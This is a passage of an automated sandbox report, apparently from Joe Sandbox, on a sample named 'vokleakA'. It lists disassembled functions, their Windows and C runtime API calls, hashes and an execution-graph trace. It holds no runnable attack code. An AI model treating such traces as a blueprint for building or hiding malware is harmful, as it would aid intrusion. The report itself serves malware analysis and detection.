                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                    • String ID:
                                                                                                    • API String ID: 3192549508-0
                                                                                                    • Opcode ID: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                                    • Instruction ID: 17be93bd3878235df00445469c4c747c8dbd7a907b9f456768254b9c32cbcc1b
                                                                                                    • Opcode Fuzzy Hash: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                                    • Instruction Fuzzy Hash: CA900270661144D7865017705D0968669949B4C6427618471653DD4098DBAA40505569
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                                                    • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,00000000), ref: 004170C5
                                                                                                    • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                                                    • _malloc.LIBCMT ref: 0041718A
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                                                    • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                                                    • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                                                    • _malloc.LIBCMT ref: 0041724C
                                                                                                    • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                                                    • __freea.LIBCMT ref: 004172A4
                                                                                                    • __freea.LIBCMT ref: 004172AD
                                                                                                    • ___ansicp.LIBCMT ref: 004172DE
                                                                                                    • ___convertcp.LIBCMT ref: 00417309
                                                                                                    • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                                                    • _malloc.LIBCMT ref: 00417362
                                                                                                    • _memset.LIBCMT ref: 00417384
                                                                                                    • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                                                    • ___convertcp.LIBCMT ref: 004173BA
                                                                                                    • __freea.LIBCMT ref: 004173CF
                                                                                                    • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000004.00000001.2001615999.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000004.00000001.2001615999.000000000044A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_1_400000_vokleakA.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                                    • String ID:
                                                                                                    • API String ID: 3809854901-0
                                                                                                    • Opcode ID: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                                    • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                                                    • Opcode Fuzzy Hash: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                                    • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • _malloc.LIBCMT ref: 004057DE
                                                                                                      • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                      • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                      • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                    • _malloc.LIBCMT ref: 00405842
                                                                                                    • _malloc.LIBCMT ref: 00405906
                                                                                                    • _malloc.LIBCMT ref: 00405930
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000004.00000001.2001615999.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000004.00000001.2001615999.000000000044A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_1_400000_vokleakA.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _malloc$AllocateHeap
                                                                                                    • String ID: 1.2.3
                                                                                                    • API String ID: 680241177-2310465506
                                                                                                    • Opcode ID: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                                    • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                                                                    • Opcode Fuzzy Hash: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                                    • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000004.00000001.2001615999.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000004.00000001.2001615999.000000000044A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_1_400000_vokleakA.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                    • String ID:
                                                                                                    • API String ID: 3886058894-0
                                                                                                    • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                    • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                                                    • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                    • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • EntryPoint.VOKLEAKA(80070057), ref: 004017EE
                                                                                                      • Part of subcall function 00401030: RaiseException.KERNEL32(-0000000113D97C15,00000001,00000000,00000000,00000015,2C2D8410), ref: 0040101C
                                                                                                      • Part of subcall function 00401030: GetLastError.KERNEL32 ref: 00401030
                                                                                                    • EntryPoint.VOKLEAKA(80070057), ref: 00401800
                                                                                                    • EntryPoint.VOKLEAKA(80070057), ref: 00401813
                                                                                                    • __recalloc.LIBCMT ref: 00401828
                                                                                                    • EntryPoint.VOKLEAKA(8007000E), ref: 00401839
                                                                                                    • EntryPoint.VOKLEAKA(8007000E), ref: 00401853
                                                                                                    • _calloc.LIBCMT ref: 00401861
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000004.00000001.2001615999.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000004.00000001.2001615999.000000000044A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_1_400000_vokleakA.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: EntryPoint$ErrorExceptionLastRaise__recalloc_calloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 1721462702-0
                                                                                                    • Opcode ID: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
                                                                                                    • Instruction ID: 9b44c07ae4757e317c030d83b628f3e382e80143504443e1f3b2735d650bea0f
                                                                                                    • Opcode Fuzzy Hash: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
                                                                                                    • Instruction Fuzzy Hash: AC018872500241EACA21BA229C06F1B7294DF90799F24893FF4C5762E2D63D9990D6EE
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __getptd.LIBCMT ref: 00414744
                                                                                                      • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                      • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                    • __getptd.LIBCMT ref: 0041475B
                                                                                                    • __amsg_exit.LIBCMT ref: 00414769
                                                                                                    • __lock.LIBCMT ref: 00414779
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000004.00000001.2001615999.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000004.00000001.2001615999.000000000044A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_1_400000_vokleakA.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                    • String ID: @.B
                                                                                                    • API String ID: 3521780317-470711618
                                                                                                    • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                    • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
                                                                                                    • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                    • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __lock_file.LIBCMT ref: 0040C6C8
                                                                                                    • __fileno.LIBCMT ref: 0040C6D6
                                                                                                    • __fileno.LIBCMT ref: 0040C6E2
                                                                                                    • __fileno.LIBCMT ref: 0040C6EE
                                                                                                    • __fileno.LIBCMT ref: 0040C6FE
                                                                                                      • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                      • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000004.00000001.2001615999.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000004.00000001.2001615999.000000000044A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_1_400000_vokleakA.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                                                    • String ID:
                                                                                                    • API String ID: 2805327698-0
                                                                                                    • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                    • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                                                                    • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                    • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __getptd.LIBCMT ref: 00413FD8
                                                                                                      • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                      • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                    • __amsg_exit.LIBCMT ref: 00413FF8
                                                                                                    • __lock.LIBCMT ref: 00414008
                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                                                                    • InterlockedIncrement.KERNEL32(00422910), ref: 00414050
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000004.00000001.2001615999.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000004.00000001.2001615999.000000000044A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_1_400000_vokleakA.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                    • String ID:
                                                                                                    • API String ID: 4271482742-0
                                                                                                    • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                    • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                                                                                                    • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                    • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                                                    • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000004.00000001.2001615999.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000004.00000001.2001615999.000000000044A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_1_400000_vokleakA.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                    • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                    • API String ID: 1646373207-3105848591
                                                                                                    • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                    • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                                                                    • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                    • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __fileno.LIBCMT ref: 0040C77C
                                                                                                    • __locking.LIBCMT ref: 0040C791
                                                                                                      • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                      • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000004.00000001.2001615999.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000004.00000001.2001615999.000000000044A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_1_400000_vokleakA.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                                                                    • String ID:
                                                                                                    • API String ID: 2395185920-0
                                                                                                    • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                    • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
                                                                                                    • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                    • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000004.00000001.2001615999.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000004.00000001.2001615999.000000000044A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_1_400000_vokleakA.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _fseek_malloc_memset
                                                                                                    • String ID:
                                                                                                    • API String ID: 208892515-0
                                                                                                    • Opcode ID: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                                    • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                                                                                                    • Opcode Fuzzy Hash: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                                    • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __flush.LIBCMT ref: 0040BB6E
                                                                                                    • __fileno.LIBCMT ref: 0040BB8E
                                                                                                    • __locking.LIBCMT ref: 0040BB95
                                                                                                    • __flsbuf.LIBCMT ref: 0040BBC0
                                                                                                      • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                      • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000004.00000001.2001615999.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000004.00000001.2001615999.000000000044A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_1_400000_vokleakA.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                    • String ID:
                                                                                                    • API String ID: 3240763771-0
                                                                                                    • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                    • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
                                                                                                    • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                    • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                                                                    • __isleadbyte_l.LIBCMT ref: 00415307
                                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000004.00000001.2001615999.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000004.00000001.2001615999.000000000044A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_1_400000_vokleakA.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                    • String ID:
                                                                                                    • API String ID: 3058430110-0
                                                                                                    • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                    • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                                                                    • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                    • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000004.00000001.2001615999.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000004.00000001.2001615999.000000000044A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_1_400000_vokleakA.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                    • String ID:
                                                                                                    • API String ID: 3016257755-0
                                                                                                    • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                    • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                                                    • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                    • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:6.8%
                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                    Signature Coverage:0%
                                                                                                    Total number of Nodes:400
                                                                                                    Total number of Limit Nodes:24
                                                                                                    execution_graph 38093 4074fa4 38094 4074f68 38093->38094 38095 4074f38 38093->38095 38094->38095 38096 4074f6e SysFreeString 38094->38096 38096->38095 38097 40717c3 38098 4071a04 38097->38098 38099 40717d8 38097->38099 38100 40719d4 38098->38100 38101 4071b1c 38098->38101 38108 40717ea 38099->38108 38112 4071867 Sleep 38099->38112 38105 40719e3 Sleep 38100->38105 38113 4071a22 38100->38113 38103 4071b25 38101->38103 38104 4071720 VirtualAlloc 38101->38104 38102 40717f9 38106 407175b 38104->38106 38107 407174b 38104->38107 38110 40719f9 Sleep 38105->38110 38105->38113 38121 40716e0 38107->38121 38108->38102 38109 40718c8 38108->38109 38114 40718a6 Sleep 38108->38114 38120 40718d4 38109->38120 38127 4071668 38109->38127 38110->38100 38112->38108 38115 4071880 Sleep 38112->38115 38116 4071668 VirtualAlloc 38113->38116 38119 4071a40 38113->38119 38114->38109 38117 40718bc Sleep 38114->38117 38115->38099 38116->38119 38117->38108 38122 407171d 38121->38122 38123 40716e9 38121->38123 38122->38106 38123->38122 38124 40716eb Sleep 38123->38124 38125 4071700 38124->38125 38125->38122 38126 4071704 Sleep 38125->38126 38126->38123 38131 40715fc 38127->38131 38129 4071670 VirtualAlloc 38130 4071687 38129->38130 38130->38120 38132 407159c 38131->38132 38132->38129 38133 409765c MulDiv 38134 4097698 38133->38134 38135 40976ae 38133->38135 38199 4097618 SelectObject 38134->38199 38149 4090204 38135->38149 38138 40976ba 38153 40902a4 38138->38153 38139 409769d 38139->38135 38200 4074820 38139->38200 38145 4097701 38150 409020a 38149->38150 38151 40902a4 10 API calls 38150->38151 38152 4090222 38151->38152 38152->38138 38154 40902cb 38153->38154 38155 40902b1 38153->38155 38159 4090308 38154->38159 38156 40902c1 38155->38156 38157 40902b7 RegCloseKey 38155->38157 38158 4090274 9 API calls 38156->38158 38157->38156 38158->38154 38160 4074820 8 API calls 38159->38160 38161 4090331 38160->38161 38163 4090351 38161->38163 38209 4074cec 8 API calls 38161->38209 38164 4090373 RegOpenKeyExA 38163->38164 38165 4090385 38164->38165 38169 40903c1 38164->38169 38166 40903af 38165->38166 38210 4074b0c 38165->38210 38219 40902d0 9 API calls 38166->38219 38170 40903de RegOpenKeyExA 38169->38170 38171 40903f0 38170->38171 38175 4090429 38170->38175 38173 409041a 38171->38173 38176 4074b0c 8 API calls 38171->38176 38220 40902d0 9 API calls 38173->38220 38179 4090443 RegOpenKeyExA 38175->38179 38176->38173 38178 40903bc 38222 4074788 38178->38222 38179->38178 38180 4090455 38179->38180 38181 409047f 38180->38181 38182 4074b0c 8 API calls 38180->38182 38221 40902d0 9 API calls 38181->38221 38182->38181 38184 4090538 38262 4090510 38184->38262 38187 40905a1 38190 4074788 8 API calls 38187->38190 38188 4090552 38265 4074878 38188->38265 38197 4090596 38190->38197 38191 409055d 38270 40905b0 32 API calls 38191->38270 38193 4090575 38194 4090598 38193->38194 38196 4090581 38193->38196 38271 409019c 32 API calls 38194->38271 38198 4074ed4 8 API calls 38196->38198 38204 4090274 38197->38204 38198->38197 38199->38139 38202 4074824 38200->38202 38201 4074848 38201->38135 38202->38201 38203 4072cc8 8 API calls 38202->38203 38203->38201 38205 409027e 38204->38205 38206 40902a0 38204->38206 38207 409028a RegCloseKey 38205->38207 38206->38145 38208 4074788 8 API calls 38207->38208 38208->38206 38209->38163 38211 4074b1d 38210->38211 38212 4074b43 38211->38212 38213 4074b5a 38211->38213 38226 4074ed4 38212->38226 38232 407484c 38213->38232 38216 4074b50 38217 4074b8b 38216->38217 38237 40747dc 38216->38237 38219->38178 38220->38178 38221->38178 38223 407478e 38222->38223 38225 40747a9 38222->38225 38224 4072cc8 8 API calls 38223->38224 38223->38225 38224->38225 38225->38145 38225->38184 38227 4074ee1 38226->38227 38231 4074f11 38226->38231 38229 4074eed 38227->38229 38230 407484c 8 API calls 38227->38230 38228 4074788 8 API calls 38228->38229 38229->38216 38230->38231 38231->38228 38233 4074874 38232->38233 38234 4074850 38232->38234 38233->38216 38243 4072cac 38234->38243 38236 407485d 38236->38216 38238 40747e0 38237->38238 38241 40747f0 38237->38241 38240 407484c 8 API calls 38238->38240 38238->38241 38239 407481e 38239->38217 38240->38241 38241->38239 38253 4072cc8 38241->38253 38244 4072cc3 38243->38244 38246 4072cb0 38243->38246 38244->38236 38245 4072cba 38245->38236 38246->38245 38247 4072dd5 38246->38247 38251 407686c TlsGetValue 38246->38251 38252 4072da4 7 API calls 38247->38252 38250 4072df6 38250->38236 38251->38247 38252->38250 38254 4072cd6 38253->38254 38255 4072ccc 38253->38255 38254->38239 38255->38254 38256 4072dd5 38255->38256 38260 407686c TlsGetValue 38255->38260 38261 4072da4 7 API calls 38256->38261 38259 4072df6 38259->38239 38260->38256 38261->38259 38272 40904c0 38262->38272 38264 4090524 38264->38187 38264->38188 38266 407484c 8 API calls 38265->38266 38267 4074888 38266->38267 38268 4074788 8 API calls 38267->38268 38269 40748a0 38268->38269 38269->38191 38270->38193 38271->38197 38273 40904d9 38272->38273 38274 40904ed RegQueryValueExA 38273->38274 38275 4090504 38274->38275 38275->38264 38276 40d8704 38279 40cca40 38276->38279 38280 40cca48 38279->38280 38280->38280 38281 40cca4f 38280->38281 38282 40cca74 38281->38282 38283 40cca7a 38282->38283 